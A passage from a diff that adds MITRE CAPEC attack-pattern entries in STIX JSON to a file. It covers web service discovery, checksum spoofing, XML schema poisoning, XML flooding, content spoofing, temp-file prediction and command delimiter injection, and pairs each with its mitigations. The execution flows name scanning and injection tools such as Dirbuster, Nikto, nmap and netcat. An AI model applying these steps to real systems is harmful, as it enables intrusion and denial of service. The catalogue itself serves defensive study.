", + "x_capec_prerequisites": [ + "The targeted web site must include pages within its published tree that are not connected to its tree of links. The sensitivity of the content of these pages determines the severity of this attack." + ], + "x_capec_resources_required": [ + "Spidering tools to explore the target web site are extremely useful in this attack especially when attacking large sites. Some tools might also be able to automatically construct common page locations from known paths." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary searches a targeted web site for web services that have not been publicized. This attack can be especially dangerous since unpublished but available services may not have adequate security controls placed upon them given that an administrator may believe they are unreachable.", + "external_references": [ + { + "external_id": "CAPEC-144", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/144.html" + }, + { + "external_id": "CWE-425", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/425.html" + } + ], + "id": "attack-pattern--af65cbd9-cc10-4c4f-9cc3-843941cdf357", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Detect Unpublicized Web Services", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--797f4b4e-371a-4d06-9e98-5cccb8a7ebc1" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find target web site: An adversary finds a target web site that they think may have unpublicized web services

  2. Map the published web site: The adversary will map the published web site either by using an automated tool or by manually accessing well-known debugging or logging pages, or otherwise predictable pages within the site tree

  3. Techniques
    Use Dirbuster to brute force directories and file names to find unpublicized web services
    Find a pattern in the naming of documents and extrapolate this pattern to discover additional documents that have been created but are no longer externally linked

Experiment

  1. Try to find weaknesses or information: The adversary will try to find weaknesses in the unpublicized services that the targeted site did not intend to be public

  2. Techniques
    Use Nikto to look for web service vulnerabilities

Exploit

  1. Follow-up attack: Use any information or weaknesses found to carry out a follow-up attack

", + "x_capec_prerequisites": [ + "The targeted web site must include unpublished services within its web tree. The nature of these services determines the severity of this attack." + ], + "x_capec_resources_required": [ + "Spidering tools to explore the target web site are extremely useful in this attack especially when attacking large sites. Some tools might also be able to automatically construct common service queries from known paths." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary spoofs a checksum message for the purpose of making a payload appear to have a valid corresponding checksum. Checksums are used to verify message integrity. They consist of some value based on the value of the message they are protecting. Hash codes are a common checksum mechanism. Both the sender and recipient are able to compute the checksum based on the contents of the message. If the message contents change between the sender and recipient, the sender and recipient will compute different checksum values. Since the sender's checksum value is transmitted with the message, the recipient would know that a modification occurred. In checksum spoofing an adversary modifies the message body and then modifies the corresponding checksum so that the recipient's checksum calculation will match the checksum (created by the adversary) in the message. 
This would prevent the recipient from realizing that a change occurred.", + "external_references": [ + { + "external_id": "CAPEC-145", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/145.html" + }, + { + "external_id": "CWE-354", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/354.html" + } + ], + "id": "attack-pattern--9d8a9dc3-5115-43c3-a5ec-8003e7b97b2e", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Checksum Spoofing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--bd4f8f46-1bc7-40a9-b15a-e36b7671cf5b" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "The adversary must be able to intercept a message from the sender (keeping the recipient from getting it), modify it, and send the modified message to the recipient.", + "The sender and recipient must use a checksum to protect the integrity of their message and transmit this checksum in a manner where the adversary can intercept and modify it.", + "The checksum value must be computable using information known to the adversary. A cryptographic checksum, which uses a key known only to the sender and recipient, would thwart this attack." + ], + "x_capec_resources_required": [ + "The adversary must have a utility that can intercept and modify messages between the sender and recipient." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary corrupts or modifies the content of XML schema information passed between a client and server for the purpose of undermining the security of the target. XML Schemas provide the structure and content definitions for XML documents. 
Schema poisoning is the ability to manipulate a schema either by replacing or modifying it to compromise the programs that process documents that use this schema.", + "external_references": [ + { + "external_id": "CAPEC-146", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/146.html" + }, + { + "external_id": "CWE-15", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/15.html" + }, + { + "external_id": "CWE-472", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/472.html" + } + ], + "id": "attack-pattern--ebf4bdc7-73dd-47c4-96e1-1ff471efbcd2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "XML Schema Poisoning", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--41cfbb50-1b96-4004-a42e-6e8d21dd6f87" + ], + "x_capec_consequences": { + "Availability": [ + "Unreliable Execution (A successful schema poisoning attack can compromise the availability of the target system's service by exhausting its available resources.)", + "Resource Consumption (A successful schema poisoning attack can compromise the availability of the target system's service by exhausting its available resources.)" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n XML Schema Poisoning Attacks can often occur locally due to being embedded within the XML document itself or being located on the host within an improperaly protected file. In these cases, the adversary can simply edit the XML schema without the need for additional privileges. An example of the former can be seen below:\n ]> John Smith 555-1234 jsmith@email.com
1 Example Lane
\n If the 'name' attribute is required in all submitted documents and this field is removed by the adversary, the application may enter an unexpected state or record incomplete data. Additionally, if this data is needed to perform additional functions, a Denial of Service (DOS) may occur.\n ", + "\n XML Schema Poisoning Attacks can also be executed remotely if the HTTP protocol is being used to transport data. :\n John Smith 555-1234 jsmith@email.com
1 Example Lane
\n The HTTP protocol does not encrypt the traffic it transports, so all communication occurs in plaintext. This traffic can be observed and modified by the adversary during transit to alter the XML schema before it reaches the end user. The adversary can perform a Adversary-in-the-Middle (CAPEC-94) Attack to alter the schema in the same way as the previous example and to acheive the same results.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine if XML schema is local or remote: Because this attack differs slightly if the target uses remote XML schemas versus local schemas, the adversary first needs to determine which of the two are used.

Experiment

  1. Gain access to XML schema: The adversary gains access to the XML schema so that they can modify the contents.

  2. Techniques
    For a local scenario, the adversary needs access to the machine that the schema is located on and needs to gain permissions to alter the contents of the file.
    For a remote scenario, the adversary needs to be able to sniff HTTP traffic that contains an XML schema.

Exploit

  1. Poison XML schema: Once the adversary gains access to the XML schema, they will alter it to achieve a desired effect. Locally, they can simply modify the file. For remote schemas, the adversary will alter the schema in transit by performing an adversary in the middle attack.

  2. Techniques
    Cause a denial of service by modifying the schema so that it does not contain required information for subsequent processing. For example, the unaltered schema may require a @name attribute in all submitted documents. If the adversary removes this attribute from the schema then documents created using the new grammar may lack this field, which may cause the processing application to enter an unexpected state or record incomplete data.
    Manipulation of the data types described in the schema may affect the results of calculations. For example, a float field could be changed to an int field.
    Change the encoding defined in the schema for certain fields allowing the contents to bypass filters that scan for dangerous strings. For example, the modified schema might use a URL encoding instead of ASCII, and a filter that catches a semicolon (;) might fail to detect its URL encoding (%3B).
", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Some level of access to modify the target schema.", + "The schema used by the target application must be improperly secured against unauthorized modification and manipulation." + ], + "x_capec_resources_required": [ + "Access to the schema and the knowledge and ability modify it. Ability to replace or redirect access to the modified schema." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Protect the schema against unauthorized modification.", + "id": "course-of-action--c36e13c8-5f07-493b-9093-bc3656142e52", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-146-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--aa8c2087-a10b-40c8-aa4d-00be4324dda2", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c36e13c8-5f07-493b-9093-bc3656142e52", + "target_ref": "attack-pattern--ebf4bdc7-73dd-47c4-96e1-1ff471efbcd2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: For applications that use a known schema, use a local copy or a known good repository instead of the schema reference supplied in the XML document. 
Additionally, ensure that the proper permissions are set on local files to avoid unauthorized modification.", + "id": "course-of-action--bdd2a92c-5b73-40d3-ad60-b046cf2aa3de", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-146-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8075cef3-6e2d-40ac-9e91-b9a4e17b5460", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bdd2a92c-5b73-40d3-ad60-b046cf2aa3de", + "target_ref": "attack-pattern--ebf4bdc7-73dd-47c4-96e1-1ff471efbcd2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: For applications that leverage remote schemas, use the HTTPS protocol to prevent modification of traffic in transit and to avoid unauthorized modification.", + "id": "course-of-action--64ccbe5a-017d-44f3-9f60-79e90c24af52", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-146-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--03fec1aa-4921-455b-89f5-01af59405338", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--64ccbe5a-017d-44f3-9f60-79e90c24af52", + "target_ref": 
"attack-pattern--ebf4bdc7-73dd-47c4-96e1-1ff471efbcd2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker initiates a resource depletion attack where a large number of small XML messages are delivered at a sufficiently rapid rate to cause a denial of service or crash of the target. Transactions such as repetitive SOAP transactions can deplete resources faster than a simple flooding attack because of the additional resources used by the SOAP protocol and the resources necessary to process SOAP messages. The transactions used are immaterial as long as they cause resource utilization on the target. In other words, this is a normal flooding attack augmented by using messages that will require extra processing on the target.", + "external_references": [ + { + "external_id": "CAPEC-147", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/147.html" + }, + { + "external_id": "CWE-400", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/400.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + } + ], + "id": "attack-pattern--94238840-08ad-4117-8a20-ed359cda1e7e", + "modified": "2018-07-31T00:00:00.000Z", + "name": "XML Ping of the Death", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--ad3913be-6ca6-48e6-9e3b-7b67e4162612" + ], + "x_capec_consequences": { + "Availability": [ + "Resource Consumption (DoS: resource consumption (other))" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Consider the case of attack performed against the createCustomerBillingAccount Web Service for an online store. 
In this case, the createCustomerBillingAccount Web Service receives a huge number of simultaneous requests, containing nonsense billing account creation information (the small XML messages). The createCustomerBillingAccount Web Services may forward the messages to other Web Services for processing. The application suffers from a high load of requests, potentially leading to a complete loss of availability the involved Web Service." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the target: Using a browser or an automated tool, an attacker records all instance of web services to process XML requests.

  2. Techniques
    Use an automated tool to record all instances of URLs to process XML requests.
    Use a browser to manually explore the website and analyze how the application processes XML requests.

Exploit

  1. Launch a resource depletion attack: The attacker delivers a large number of small XML messages to the target URLs found in the explore phase at a sufficiently rapid rate. It causes denial of service to the target application.

  2. Techniques
    Send a large number of crafted small XML messages to the target URL.
", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The target must receive and process XML transactions." + ], + "x_capec_resources_required": [ + "Transaction generator(s)/source(s) and ability to cause arrival of messages at the target with sufficient rapidity to overload target. Larger targets may be able to handle large volumes of requests so the attacker may require significant resources (such as a distributed network) to affect the target. However, the resources required of the attacker would be less than in the case of a simple flooding attack against the same target." + ], + "x_capec_skills_required": { + "High": "To use distributed network to launch the attack", + "Low": "To send small XML messages" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Build throttling mechanism into the resource allocation. 
Provide for a timeout mechanism for allocated resources whose transaction does not complete within a specified interval.", + "id": "course-of-action--098aadf6-648b-4c3a-bbf9-224e6bd430fd", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-147-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cfd5f6e5-9782-45a5-9d8c-a1883c4b6d34", + "modified": "2018-07-31T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--098aadf6-648b-4c3a-bbf9-224e6bd430fd", + "target_ref": "attack-pattern--94238840-08ad-4117-8a20-ed359cda1e7e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Provide for network flow control and traffic shaping to control access to the resources.", + "id": "course-of-action--ba0208fb-20e5-4c4f-9a93-d5d806d038e6", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-147-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2d06b870-3a8b-4f06-aa89-258fb7aec1e8", + "modified": "2018-07-31T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ba0208fb-20e5-4c4f-9a93-d5d806d038e6", + "target_ref": "attack-pattern--94238840-08ad-4117-8a20-ed359cda1e7e", + "type": 
"relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary modifies content to make it contain something other than what the original content producer intended while keeping the apparent source of the content unchanged. The term content spoofing is most often used to describe modification of web pages hosted by a target to display the adversary's content instead of the owner's content. However, any content can be spoofed, including the content of email messages, file transfers, or the content of other network communication protocols. Content can be modified at the source (e.g. modifying the source file for a web page) or in transit (e.g. intercepting and modifying a message between the sender and recipient). Usually, the adversary will attempt to hide the fact that the content has been modified, but in some cases, such as with web site defacement, this is not necessary. 
Content Spoofing can lead to malware exposure, financial fraud (if the content governs financial transactions), privacy violations, and other unwanted outcomes.", + "external_references": [ + { + "external_id": "CAPEC-148", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/148.html" + }, + { + "external_id": "CWE-345", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/345.html" + }, + { + "description": "Defacement", + "external_id": "T1491", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1491" + }, + { + "description": "Content Spoofing", + "external_id": "12", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Content-Spoofing" + }, + { + "description": "Content Spoofing", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Content_Spoofing" + } + ], + "id": "attack-pattern--bd4f8f46-1bc7-40a9-b15a-e36b7671cf5b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Content Spoofing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_can_follow_refs": [ + "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "attack-pattern--ae3f2c33-9018-442e-9cc3-24d65c7f4974", + "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80", + "attack-pattern--8c806dfa-b8ca-45f9-9f97-09e4b5c1157b", + "attack-pattern--cd6af290-f89e-4238-95b3-6f06d05ed814" + ], + "x_capec_consequences": { + "Integrity": [ + "Modify Data (A successful content spoofing attack compromises the integrity of the application data.)" + ] + }, + "x_capec_domains": [ + "Communications", + "Software", + "Hardware" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--9d8a9dc3-5115-43c3-a5ec-8003e7b97b2e", + "attack-pattern--e7c0cce1-203e-454d-8a9a-76fa7ca120f8", + 
"attack-pattern--b2e8de4b-6757-4e7e-9c5c-210c44100577", + "attack-pattern--2e1be870-6442-4978-9a30-46d518aa1f74" + ], + "x_capec_prerequisites": [ + "The target must provide content but fail to adequately protect it against modification.The adversary must have the means to alter data to which they are not authorized. If the content is to be modified in transit, the adversary must be able to intercept the targeted messages." + ], + "x_capec_resources_required": [ + "\n If the content is to be modified in transit, the adversary requires a tool capable of intercepting the target's communication and generating/creating custom packets to impact the communications.\n In some variants, the targeted content is altered so that all or some of it is redirected towards content published by the attacker (for example, images and frames in the target's web site might be modified to be loaded from a source controlled by the attacker). In these cases, the attacker requires the necessary resources to host the replacement content.\n " + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker explores a target to identify the names and locations of predictable temporary files for the purpose of launching further attacks against the target. This involves analyzing naming conventions and storage locations of the temporary files created by a target application. 
If an attacker can predict the names of temporary files they can use this information to mount other attacks, such as information gathering and symlink attacks.", + "external_references": [ + { + "external_id": "CAPEC-149", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/149.html" + }, + { + "external_id": "CWE-377", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/377.html" + } + ], + "id": "attack-pattern--bddd2549-167f-4f7b-8d0f-6d1e647b26f6", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Explore for Predictable Temporary File Names", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--7fea6e82-183a-4811-9b71-1ebe4d6c8b11" + ], + "x_capec_child_of_refs": [ + "attack-pattern--323ed142-7793-413d-838f-72626caf58da" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "The targeted application must create names for temporary files using a predictable procedure, e.g. using sequentially increasing numbers.", + "The attacker must be able to see the names of the files the target is creating." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attack of this type exploits a programs' vulnerabilities that allows an attacker's commands to be concatenated onto a legitimate command with the intent of targeting other resources such as the file system or database. 
The system that uses a filter or denylist input validation, as opposed to allowlist validation is vulnerable to an attacker who predicts delimiters (or combinations of delimiters) not present in the filter or denylist. As with other injection attacks, the attacker uses the command delimiter payload as an entry point to tunnel through the application and activate additional attacks through SQL queries, shell commands, network scanning, and so on.", + "external_references": [ + { + "external_id": "CAPEC-15", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/15.html" + }, + { + "external_id": "CWE-146", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/146.html" + }, + { + "external_id": "CWE-77", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/77.html" + }, + { + "external_id": "CWE-184", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/184.html" + }, + { + "external_id": "CWE-78", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/78.html" + }, + { + "external_id": "CWE-185", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/185.html" + }, + { + "external_id": "CWE-93", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/93.html" + }, + { + "external_id": "CWE-140", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/140.html" + }, + { + "external_id": "CWE-157", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/157.html" + }, + { + "external_id": "CWE-138", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/138.html" + }, + { + "external_id": "CWE-154", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/154.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "description": "G. Hoglund, G. 
McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--582943a5-d66c-48a9-8cf8-76e511222c7d", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Command Delimiters", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--cde07b71-23e6-418d-93e9-665f5f83b032" + ], + "x_capec_consequences": { + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n By appending special characters, such as a semicolon or other commands that are executed by the target process, the attacker is able to execute a wide variety of malicious commands in the target process space, utilizing the target's inherited permissions, against any resource the host has access to. The possibilities are vast including injection attacks against RDBMS (SQL Injection), directory servers (LDAP Injection), XML documents (XPath and XQuery Injection), and command line shells. In many injection attacks, the results are converted back to strings and displayed to the client process such as a web browser without tripping any security alarms, so the network firewall does not log any out of the ordinary behavior.\n LDAP servers house critical identity assets such as user, profile, password, and group information that is used to authenticate and authorize users. An attacker that can query the directory at will and execute custom commands against the directory server is literally working with the keys to the kingdom in many enterprises. 
When user, organizational units, and other directory objects are queried by building the query string directly from user input with no validation, or other conversion, then the attacker has the ability to use any LDAP commands to query, filter, list, and crawl against the LDAP server directly in the same manner as SQL injection gives the ability to the attacker to run SQL commands on the database.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Assess Target Runtime Environment: In situations where the runtime environment is not implicitly known, the attacker makes connections to the target system and tries to determine the system's runtime environment. Knowing the environment is vital to choosing the correct delimiters.

  2. Techniques
    Port mapping using network connection-based software (e.g., nmap, nessus, etc.)
    Port mapping by exploring the operating system (netstat, sockstat, etc.)
    TCP/IP Fingerprinting
    Induce errors to find informative error messages
  3. Survey the Application: The attacker surveys the target application, possibly as a valid and authenticated user

  4. Techniques
    Spidering web sites for all available links
    Inventory all application inputs

Experiment

  1. Attempt delimiters in inputs: The attacker systematically attempts variations of delimiters on known inputs, observing the application's response each time.

  2. Techniques
    Inject command delimiters using network packet injection tools (netcat, nemesis, etc.)
    Inject command delimiters using web test frameworks (proxies, TamperData, custom programs, etc.)
    Enter command delimiters directly in input fields.

Exploit

  1. Use malicious command delimiters: The attacker uses combinations of payload and carefully placed command delimiters to attack the software.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--70c8a212-72da-4a98-a626-e5d38e5416e3" + ], + "x_capec_prerequisites": [ + "Software's input validation or filtering must not detect and block presence of additional malicious command." + ], + "x_capec_resources_required": [ + "Ability to communicate synchronously or asynchronously with server. Optionally, ability to capture output directly through synchronous communication or other method such as FTP." + ], + "x_capec_skills_required": { + "Medium": "The attacker has to identify injection vector, identify the specific commands, and optionally collect the output, i.e. from an interactive session." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Perform allowlist validation against a positive specification for command length, type, and parameters.", + "id": "course-of-action--e5c4fb82-e889-429a-a343-f75a01e515dd", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-15-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--08d4d25a-ee13-4f19-b709-f7bbafb7d0d9", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e5c4fb82-e889-429a-a343-f75a01e515dd", + "target_ref": "attack-pattern--582943a5-d66c-48a9-8cf8-76e511222c7d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": 
"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Limit program privileges, so if commands circumvent program input validation or filter routines then commands do not running under a privileged account", + "id": "course-of-action--461e2128-8614-4665-acaa-4090f980504d", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-15-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3ab83c6e-5e54-4214-be2d-b4a9cb52405f", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--461e2128-8614-4665-acaa-4090f980504d", + "target_ref": "attack-pattern--582943a5-d66c-48a9-8cf8-76e511222c7d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Perform input validation for all remote content.", + "id": "course-of-action--8a996efc-52e0-4aaf-953a-21c3fe64c64b", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-15-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--78b9961e-bbb1-4c40-9286-e4eedbba14bc", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": 